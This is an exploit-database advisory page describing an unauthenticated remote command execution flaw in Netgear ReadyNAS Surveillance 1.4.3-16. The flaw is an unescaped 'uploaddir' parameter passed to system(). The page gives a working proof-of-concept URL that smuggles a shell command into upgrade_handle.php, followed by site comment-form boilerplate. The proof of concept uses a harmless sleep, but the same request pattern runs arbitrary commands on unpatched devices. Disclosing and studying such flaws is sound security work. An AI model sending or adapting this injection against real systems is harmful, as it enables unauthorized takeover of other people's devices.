Netgear ReadyNAS Surveillance 1.4.3-16 Remote Command Execution

2017.10.05

Credit: Kacper Szurek

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-78

# Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE
# Date: 27.09.2017
# Software Link: https://www.netgear.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
1. Description
$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.
https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html
2. Proof of Concept
http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27

References:

https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Netgear ReadyNAS Surveillance 1.4.3-16 Remote Command Execution

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.